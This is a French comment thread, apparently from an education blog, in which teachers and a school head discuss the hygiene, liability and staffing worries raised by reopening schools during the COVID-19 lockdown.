    Dimanche 26 Avril à 15:18
    Bonjour
    Quid de la responsabilité des enseignants dans le cas où la sucette ou le doudou a été échangé: est ce que les parents pourront se retourner contre nous?
    Quid des jeunes en établissement qui ne peuvent du fait de leur handicap respecter les gestes barrières, mettent tout à la bouche y compris nos doigts ou bras ou cheveux... Qui ne supporteront pas de nous voir avec un masque ( les jeunes autistes par exemple), qui crachent pour se stimuler ou bavent?
    Merci et bon courage à tous!
    34
    Sylou
    Dimanche 26 Avril à 21:28

    Avec la participation de l'association des parents achat d'un pot à crayons avec le matériel de la trousse nominatif et qui reste en classe. Trousse qui reste à la maison donc pas d'échange entre les 2. Achat de petits paquets de mouchoirs individuels. Taille crayon avec réservoir pour limiter les déplacements.

    Poubelle de table pour chaque enfant peut être en recyclant une boite de conserve ?

    Bac pour mettre les feuilles à corriger mais qui ne le seront que le surlendemain.

    35
    Kleklo
    Lundi 27 Avril à 07:34
    Responsabilité : si notre classe doit être seule en récréation, comment l'enseignant fait-il pour aller aux toilettes ?
    36
    Sandrine
    Lundi 27 Avril à 15:34

    Bonjour, je suis chef d'établissement et je compte faire valoir mon droit de retrait si j'en ai le droit d'ailleurs, sinon j'assumerai mais hors de question de rouvrir l'école dans la précipitation. Il en va de la santé de tous!!!! Inadmissible que le gouvernement aille à contre sens des recommandations du conseil scientifique. Pourquoi ne pas mûrir un plan de retour à l'école en toute sérénité et reprendre en septembre. Mais non vite vite redressons l'économie!!!C'est tellement plus important!!! Les élèves décrocheurs ont vraiment bon dos!!!! Quelle honte!!! Le gouvernement assumera t-il tous ces morts supplémentaires????

    37
    maman enseignante
    Mardi 28 Avril à 21:45
    Comment faire si nous avons des enfants d âge scolaire et que nous souhaitons pas les mettre à l’école? Peut on continuer le télétravail ou les élèves seront accueillis par nos collègues (charge sue je ne veux absolument pas imposer)
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :